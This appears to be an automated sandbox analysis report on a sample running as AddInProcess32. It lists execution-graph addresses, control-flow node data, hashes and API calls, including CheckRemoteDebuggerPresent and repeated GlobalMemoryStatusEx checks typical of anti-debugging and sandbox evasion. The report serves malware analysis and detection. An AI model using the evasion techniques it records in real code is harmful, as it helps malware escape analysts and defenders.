                                                                                                                                                                                                                                                    execution_graph 43033 6493898 43034 64938de GetCurrentProcess 43033->43034 43036 6493929 43034->43036 43037 6493930 GetCurrentThread 43034->43037 43036->43037 43038 649396d GetCurrentProcess 43037->43038 43039 6493966 43037->43039 43040 64939a3 43038->43040 43039->43038 43041 64939cb GetCurrentThreadId 43040->43041 43042 64939fc 43041->43042 43019 69a2f38 43020 69a2f60 43019->43020 43023 69a2f8c 43019->43023 43021 69a2f69 43020->43021 43024 69a23fc 43020->43024 43025 69a2407 43024->43025 43026 69a3283 43025->43026 43028 69a2418 43025->43028 43026->43023 43029 69a32b8 OleInitialize 43028->43029 43030 69a331c 43029->43030 43030->43026 43043 11e0848 43044 11e084e 43043->43044 43045 11e091b 43044->43045 43049 11e137f 43044->43049 43058 6492790 43044->43058 43062 6492780 43044->43062 43057 11e138b 43049->43057 43050 11e14be 43050->43044 43057->43050 43066 11e8a20 43057->43066 43071 11e8170 43057->43071 43076 11e8339 43057->43076 43081 11e82da 43057->43081 43086 11e829c 43057->43086 43091 11e8161 43057->43091 43059 649279f 43058->43059 43118 6491f24 43059->43118 43063 6492790 43062->43063 43064 6491f24 2 API calls 43063->43064 43065 64927c0 43064->43065 43065->43044 43067 11e8a2a 43066->43067 43068 11e8a44 43067->43068 43096 64bfa18 43067->43096 43101 64bfa28 43067->43101 43068->43057 43073 11e8189 43071->43073 43072 11e83cb 43072->43057 43073->43072 43106 11e87d8 43073->43106 43110 11e87e8 43073->43110 43078 11e833e 43076->43078 43077 11e83cb 43077->43057 43079 11e87d8 DeleteFileW 43078->43079 43080 11e87e8 DeleteFileW 43078->43080 43079->43077 43080->43077 43083 11e82df 43081->43083 43082 11e83cb 43082->43057 43084 11e87d8 DeleteFileW 43083->43084 43085 11e87e8 DeleteFileW 43083->43085 43084->43082 43085->43082 43088 11e82a1 43086->43088 43087 11e83cb 43087->43057 43089 11e87d8 DeleteFileW 43088->43089 43090 11e87e8 DeleteFileW 43088->43090 43089->43087 43090->43087 43093 11e8170 43091->43093 43092 11e83cb 43092->43057 43093->43092 43094 11e87d8 DeleteFileW 43093->43094 43095 11e87e8 DeleteFileW 43093->43095 43094->43092 43095->43092 43097 64bfa22 43096->43097 43098 64bfc52 43097->43098 43099 64bfc68 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 43097->43099 43100 64bfc78 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 43097->43100 43098->43068 43099->43097 43100->43097 43103 64bfa3d 43101->43103 43102 64bfc52 43102->43068 43103->43102 43104 64bfc68 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 43103->43104 43105 64bfc78 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 43103->43105 43104->43103 43105->43103 43108 11e87f8 43106->43108 43107 11e882a 43107->43072 43108->43107 43114 11e7790 43108->43114 43111 11e87f8 43110->43111 43112 11e882a 43111->43112 43113 11e7790 DeleteFileW 43111->43113 43112->43072 43113->43112 43115 11e8848 DeleteFileW 43114->43115 43117 11e88c7 43115->43117 43117->43107 43119 6491f2f 43118->43119 43122 6493694 43119->43122 43121 6494146 43123 649369f 43122->43123 43124 649486c 43123->43124 43126 64964e8 43123->43126 43124->43121 43127 6496509 43126->43127 43128 649652d 43127->43128 43130 6496698 43127->43130 43128->43124 43131 64966a5 43130->43131 43132 64966de 43131->43132 43134 64953bc 43131->43134 43132->43128 43135 64953c7 43134->43135 43137 6496750 43135->43137 43138 64953f0 43135->43138 43139 64953fb 43138->43139 43145 6495400 43139->43145 43141 64967bf 43149 649bae0 43141->43149 43155 649bac8 43141->43155 43142 64967f9 43142->43137 43148 649540b 43145->43148 43146 6497960 43146->43141 43147 64964e8 2 API calls 43147->43146 43148->43146 43148->43147 43151 649bb11 43149->43151 43152 649bb5d 43149->43152 43150 649bb1d 43150->43142 43151->43150 43161 649bd48 43151->43161 43165 649bd58 43151->43165 43152->43142 43157 649bb11 43155->43157 43158 649bb5d 43155->43158 43156 649bb1d 43156->43142 43157->43156 43159 649bd48 2 API calls 43157->43159 43160 649bd58 2 API calls 43157->43160 43158->43142 43159->43158 43160->43158 43162 649bd58 43161->43162 43168 649bd98 43162->43168 43163 649bd62 43163->43152 43167 649bd98 2 API calls 43165->43167 43166 649bd62 43166->43152 43167->43166 43169 649bd9d 43168->43169 43170 649bddc 43169->43170 43174 649c040 LoadLibraryExW 43169->43174 43175 649c032 LoadLibraryExW 43169->43175 43170->43163 43171 649bdd4 43171->43170 43172 649bfe0 GetModuleHandleW 43171->43172 43173 649c00d 43172->43173 43173->43163 43174->43171 43175->43171 43176 11e70c8 43177 11e710c CheckRemoteDebuggerPresent 43176->43177 43178 11e714e 43177->43178 43031 6493ae0 DuplicateHandle 43032 6493b76 43031->43032 43179 649df90 43180 649dff8 CreateWindowExW 43179->43180 43182 649e0b4 43180->43182

                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                    Function 064B55A8 Relevance: 1.8, Strings: 1, Instructions: 592COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1186 64b55a8-64b55c5 1187 64b55c7-64b55ca 1186->1187 1188 64b56f2-64b56fb 1187->1188 1189 64b55d0-64b55d3 1187->1189 1190 64b572d-64b5736 1188->1190 1191 64b56fd 1188->1191 1192 64b55f0-64b55f3 1189->1192 1193 64b55d5-64b55eb 1189->1193 1197 64b5738-64b5740 1190->1197 1198 64b577d-64b57ab 1190->1198 1194 64b5702-64b5705 1191->1194 1195 64b55fd-64b5600 1192->1195 1196 64b55f5-64b55f8 1192->1196 1193->1192 1199 64b571b-64b571e 1194->1199 1200 64b5707-64b5716 1194->1200 1202 64b5602-64b5605 1195->1202 1203 64b5645-64b564b 1195->1203 1196->1195 1197->1198 1204 64b5742-64b5752 1197->1204 1213 64b57b5-64b57b8 1198->1213 1208 64b5728-64b572b 1199->1208 1209 64b5720-64b5723 1199->1209 1200->1199 1210 64b5629-64b562c 1202->1210 1211 64b5607-64b5624 1202->1211 1206 64b564d 1203->1206 1207 64b5686-64b5690 1203->1207 1204->1198 1212 64b5754-64b5758 1204->1212 1215 64b5652-64b5655 1206->1215 1226 64b5697-64b5699 1207->1226 1208->1190 1216 64b575d-64b575f 1208->1216 1209->1208 1217 64b562e-64b563b 1210->1217 1218 64b5640-64b5643 1210->1218 1211->1210 1212->1216 1221 64b57da-64b57dd 1213->1221 1222 64b57ba-64b57be 1213->1222 1219 64b565f-64b5662 1215->1219 1220 64b5657-64b565a 1215->1220 1224 64b5761 1216->1224 1225 64b5766-64b5769 1216->1225 1217->1218 1218->1203 1218->1215 1229 64b5670-64b5673 1219->1229 1230 64b5664-64b5669 1219->1230 1220->1219 1233 64b57df-64b57e6 1221->1233 1234 64b57f1-64b57f4 1221->1234 1231 64b58aa-64b58e4 1222->1231 1232 64b57bf-64b57cc 1222->1232 1224->1225 1225->1187 1235 64b576f-64b577c 1225->1235 1227 64b569e-64b56a1 1226->1227 1236 64b56ab-64b56ae 1227->1236 1237 64b56a3-64b56a8 1227->1237 1240 64b5681-64b5684 1229->1240 1241 64b5675-64b567c 1229->1241 1230->1196 1238 64b566b 1230->1238 1260 64b58e6-64b58e9 1231->1260 1232->1231 1239 64b57cd-64b57d9 1232->1239 1242 64b57ec 1233->1242 1243 64b58a2-64b58a9 1233->1243 1245 64b5816-64b5819 1234->1245 1246 64b57f6-64b57fa 1234->1246 1248 64b56bf-64b56c2 1236->1248 1249 64b56b0-64b56b4 1236->1249 1237->1236 1238->1229 1239->1221 1240->1207 1240->1227 1241->1240 1242->1234 1250 64b581b-64b581f 1245->1250 1251 64b5837-64b583a 1245->1251 1246->1231 1247 64b5800-64b5808 1246->1247 1247->1231 1253 64b580e-64b5811 1247->1253 1256 64b56de-64b56e1 1248->1256 1257 64b56c4-64b56d9 1248->1257 1249->1235 1254 64b56ba 1249->1254 1250->1231 1255 64b5825-64b582d 1250->1255 1258 64b583c-64b5843 1251->1258 1259 64b5844-64b5847 1251->1259 1253->1245 1254->1248 1255->1231 1261 64b582f-64b5832 1255->1261 1266 64b56ed-64b56f0 1256->1266 1267 64b56e3-64b56ec 1256->1267 1257->1256 1262 64b5849-64b5853 1259->1262 1263 64b5858-64b585b 1259->1263 1264 64b58eb-64b58fe 1260->1264 1265 64b5901-64b5904 1260->1265 1261->1251 1262->1263 1269 64b585d-64b586e 1263->1269 1270 64b5873-64b5876 1263->1270 1271 64b590e-64b5911 1265->1271 1272 64b5906-64b590b 1265->1272 1266->1188 1266->1194 1269->1270 1275 64b5878-64b587c 1270->1275 1276 64b5890-64b5892 1270->1276 1277 64b592b-64b592e 1271->1277 1278 64b5913-64b5924 1271->1278 1272->1271 1275->1231 1284 64b587e-64b5886 1275->1284 1279 64b5899-64b589c 1276->1279 1280 64b5894 1276->1280 1281 64b593c-64b593f 1277->1281 1282 64b5930-64b5937 1277->1282 1289 64b599d-64b59a4 1278->1289 1290 64b5926 1278->1290 1279->1213 1279->1243 1280->1279 1286 64b5959-64b595c 1281->1286 1287 64b5941-64b5952 1281->1287 1282->1281 1284->1231 1288 64b5888-64b588b 1284->1288 1291 64b595e-64b5961 1286->1291 1292 64b59b2-64b5b46 1286->1292 1287->1289 1300 64b5954 1287->1300 1288->1276 1293 64b59a9-64b59ac 1289->1293 1290->1277 1295 64b597b-64b597e 1291->1295 1296 64b5963-64b5974 1291->1296 1335 64b5c7c-64b5c8f 1292->1335 1336 64b5b4c-64b5b53 1292->1336 1293->1292 1299 64b5c92-64b5c95 1293->1299 1297 64b5998-64b599b 1295->1297 1298 64b5980-64b5991 1295->1298 1296->1278 1308 64b5976 1296->1308 1297->1289 1297->1293 1298->1289 1309 64b5993 1298->1309 1299->1292 1302 64b5c9b-64b5c9e 1299->1302 1300->1286 1305 64b5cbc-64b5cbe 1302->1305 1306 64b5ca0-64b5cb1 1302->1306 1310 64b5cc0 1305->1310 1311 64b5cc5-64b5cc8 1305->1311 1306->1264 1315 64b5cb7 1306->1315 1308->1295 1309->1297 1310->1311 1311->1260 1313 64b5cce-64b5cd7 1311->1313 1315->1305 1337 64b5b59-64b5b8c 1336->1337 1338 64b5c07-64b5c0e 1336->1338 1349 64b5b8e 1337->1349 1350 64b5b91-64b5bd2 1337->1350 1338->1335 1340 64b5c10-64b5c43 1338->1340 1351 64b5c48-64b5c75 1340->1351 1352 64b5c45 1340->1352 1349->1350 1360 64b5bea-64b5bf1 1350->1360 1361 64b5bd4-64b5be5 1350->1361 1351->1313 1352->1351 1363 64b5bf9-64b5bfb 1360->1363 1361->1313 1363->1313
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1516576755.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_64b0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: $
                                                                                                                                                                                                                                                    • API String ID: 0-3993045852
                                                                                                                                                                                                                                                    • Opcode ID: 2d991a44670611384a67d1388edfb674b6da2e201b0caa121599d91ecdbfb624
                                                                                                                                                                                                                                                    • Instruction ID: 9de917495632e632e308964a349e6f83169dc2c98a6fb66cdfacf4a74e0083e7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2d991a44670611384a67d1388edfb674b6da2e201b0caa121599d91ecdbfb624
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9122AE75E002088FDB69DF68C4906EEFBB2FF85310F24956AD415AB345DA35EC42CBA0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 011E70C8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1818 11e70c8-11e714c CheckRemoteDebuggerPresent 1820 11e714e-11e7154 1818->1820 1821 11e7155-11e7190 1818->1821 1820->1821
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 011E713F
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1482200127.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_11e0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CheckDebuggerPresentRemote
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3662101638-0
                                                                                                                                                                                                                                                    • Opcode ID: 4f272ae771b591f630501fecb4c6369eac8f855a5e188d7296d31c6499058038
                                                                                                                                                                                                                                                    • Instruction ID: dd48290634d36db2b3989641627546711c6c9b8022dfa7194355b0b670c25aa4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f272ae771b591f630501fecb4c6369eac8f855a5e188d7296d31c6499058038
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E82128B19003598FDB14CF9AD484BEEBBF5AF49210F14841AE855A7350D778A944CFA1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 064B2360 Relevance: 1.5, Instructions: 1494COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1516576755.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_64b0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 9904182c3f9a627acdde834e02b89553c2878ebb67872d4e94be58a4af2e9207
                                                                                                                                                                                                                                                    • Instruction ID: a84944e80d7e0205b66095ab8c676ea7b23d6eab4dc5d0af894666f1f89cbfe7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9904182c3f9a627acdde834e02b89553c2878ebb67872d4e94be58a4af2e9207
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7CD25834E002098FCB65DF68C494AAEB7B2FF89310F5495AAD409AB355DB74ED81CF90
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 064B65E8 Relevance: .8, Instructions: 815COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1516576755.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_64b0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: a9d9589fc269f9c642e8f651f2b4a9e3f9209b10a0cf66e3015c0db3a290ea0a
                                                                                                                                                                                                                                                    • Instruction ID: 34d1080004770b2616635bdd0f56323944e9e9b5e48460fb3191384c46f4b05e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a9d9589fc269f9c642e8f651f2b4a9e3f9209b10a0cf66e3015c0db3a290ea0a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E6629C30B002049FDB55DB68D594BAEBBB2FF89310F15956AE406DB390DB35EC45CBA0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 064BB228 Relevance: .8, Instructions: 766COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1516576755.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_64b0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 6f19ad0d5dc91899b4dd19682ff420eee84ece367490474669f4de88d7f9b4c2
                                                                                                                                                                                                                                                    • Instruction ID: bf7320b9d76d7ebc41e10a5279587d868fa2a621efd10eb304dc02e3a2fecdea
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6f19ad0d5dc91899b4dd19682ff420eee84ece367490474669f4de88d7f9b4c2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 51527E30E002098FEB65DB68D4807EEB7B2FB45310F64952AE446EB791DE74DC81CBA1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 064BC170 Relevance: .6, Instructions: 641COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1516576755.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_64b0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 7bcc83d59e855aed0fc50c69faeb2dd8bcccb4d3993c4974d63ed73c3a0c51a0
                                                                                                                                                                                                                                                    • Instruction ID: b21c30d51b3a1630b7ff8096b1fdf3f79dcdf21328a25770ff38f7efa522bd5b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7bcc83d59e855aed0fc50c69faeb2dd8bcccb4d3993c4974d63ed73c3a0c51a0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F032AE30B106089FDB55EB68D5C5BAEB7B2FB88314F10952AE406EB345DB70EC41CBA1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 064B7D78 Relevance: .5, Instructions: 473COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1516576755.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_64b0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 5b9b4d9d6b94aaaf3d6ceec6852e792d8adc15a83498c1f041f2e7e7d7fd32c7
                                                                                                                                                                                                                                                    • Instruction ID: aa39f458d5318affc6fe5ef89ae83d2965e939185a5f8f667a03cf54ef02eb10
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5b9b4d9d6b94aaaf3d6ceec6852e792d8adc15a83498c1f041f2e7e7d7fd32c7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1D02AE30B002089FDB55EF68D4907AEBBA6FF85300F54952AD406DB785DB75EC82CBA0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06493892 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 130threadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 06493916
                                                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 06493953
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 06493990
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 064939E9
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1515935785.0000000006490000.00000040.00000800.00020000.00000000.sdmp, Offset: 06490000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_6490000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Current$ProcessThread
                                                                                                                                                                                                                                                    • String ID: Xi
                                                                                                                                                                                                                                                    • API String ID: 2063062207-4233896261
                                                                                                                                                                                                                                                    • Opcode ID: a1746c3b1e3cc7dfbd67a9ac14ab649951fdbd7bc1b07f2f9d3f8e70965c219d
                                                                                                                                                                                                                                                    • Instruction ID: 91cdb1a67ce2b5b7a24c11b281f3f7eb3691ae2ea688f6545f4506179aed9c3b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a1746c3b1e3cc7dfbd67a9ac14ab649951fdbd7bc1b07f2f9d3f8e70965c219d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C5144B09003099FDB55DFA9D948BEEBBF2EB49304F24801AE419AB350DB746984CB65
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06493898 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128threadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 06493916
                                                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 06493953
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 06493990
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 064939E9
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1515935785.0000000006490000.00000040.00000800.00020000.00000000.sdmp, Offset: 06490000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_6490000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Current$ProcessThread
                                                                                                                                                                                                                                                    • String ID: Xi
                                                                                                                                                                                                                                                    • API String ID: 2063062207-4233896261
                                                                                                                                                                                                                                                    • Opcode ID: c3ce1508ee3500407cc23e87d09c0eea0beb483cbe6e841bc5ac603468e1c194
                                                                                                                                                                                                                                                    • Instruction ID: 0faef750e863c6af5bc01bbb5405b885c1d95b7a1b4bb59c4c732316ca38a018
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c3ce1508ee3500407cc23e87d09c0eea0beb483cbe6e841bc5ac603468e1c194
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 105164B0D003099FDB54DFAAD948BAEBFF1EB49300F24801AE419AB350DB746984CB65
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0649BD98 Relevance: 1.7, APIs: 1, Instructions: 203COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1364 649bd98-649bdb7 1366 649bdb9-649bdc6 call 649ad0c 1364->1366 1367 649bde3-649bde7 1364->1367 1372 649bdc8 1366->1372 1373 649bddc 1366->1373 1368 649bde9-649bdf3 1367->1368 1369 649bdfb-649be3c 1367->1369 1368->1369 1376 649be49-649be57 1369->1376 1377 649be3e-649be46 1369->1377 1421 649bdce call 649c040 1372->1421 1422 649bdce call 649c032 1372->1422 1373->1367 1379 649be59-649be5e 1376->1379 1380 649be7b-649be7d 1376->1380 1377->1376 1378 649bdd4-649bdd6 1378->1373 1381 649bf18-649bfd8 1378->1381 1383 649be69 1379->1383 1384 649be60-649be67 call 649ad18 1379->1384 1382 649be80-649be87 1380->1382 1416 649bfda-649bfdd 1381->1416 1417 649bfe0-649c00b GetModuleHandleW 1381->1417 1387 649be89-649be91 1382->1387 1388 649be94-649be9b 1382->1388 1386 649be6b-649be79 1383->1386 1384->1386 1386->1382 1387->1388 1390 649bea8-649beb1 call 64943fc 1388->1390 1391 649be9d-649bea5 1388->1391 1396 649bebe-649bec3 1390->1396 1397 649beb3-649bebb 1390->1397 1391->1390 1398 649bee1-649beee 1396->1398 1399 649bec5-649becc 1396->1399 1397->1396 1406 649bf11-649bf17 1398->1406 1407 649bef0-649bf0e 1398->1407 1399->1398 1401 649bece-649bede call 6498c84 call 649ad28 1399->1401 1401->1398 1407->1406 1416->1417 1418 649c00d-649c013 1417->1418 1419 649c014-649c028 1417->1419 1418->1419 1421->1378 1422->1378
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0649BFFE
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1515935785.0000000006490000.00000040.00000800.00020000.00000000.sdmp, Offset: 06490000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_6490000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: HandleModule
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4139908857-0
                                                                                                                                                                                                                                                    • Opcode ID: 33d0420bd30b57a493633806448e329133bcb5c4bd41a2255c21145b605ba6dd
                                                                                                                                                                                                                                                    • Instruction ID: 74a35a2bb7cca10ed452b9cc7a1c777dbb82f9019c978ed19622d0975fa2c758
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 33d0420bd30b57a493633806448e329133bcb5c4bd41a2255c21145b605ba6dd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 05814470A00B058FDBA5DF2AE44475BBBF6FF88204F008A2AD496D7B40D775E945CBA1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 011EF398 Relevance: 1.6, APIs: 1, Instructions: 126COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1555 11ef398-11ef3a3 1556 11ef3cd-11ef3e3 1555->1556 1557 11ef3a5-11ef3cc 1555->1557 1577 11ef3e5 call 11ef38a 1556->1577 1578 11ef3e5 call 11ef46a 1556->1578 1579 11ef3e5 call 11ef398 1556->1579 1560 11ef3ea-11ef3ec 1561 11ef3ee-11ef3f1 1560->1561 1562 11ef3f2-11ef451 1560->1562 1569 11ef457-11ef4e4 GlobalMemoryStatusEx 1562->1569 1570 11ef453-11ef456 1562->1570 1573 11ef4ed-11ef515 1569->1573 1574 11ef4e6-11ef4ec 1569->1574 1574->1573 1577->1560 1578->1560 1579->1560
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1482200127.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_11e0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 01ed59d6e6f36bc79c2650d92e80eb8efc8eba6efe12bc2a20c44446b31bb8d5
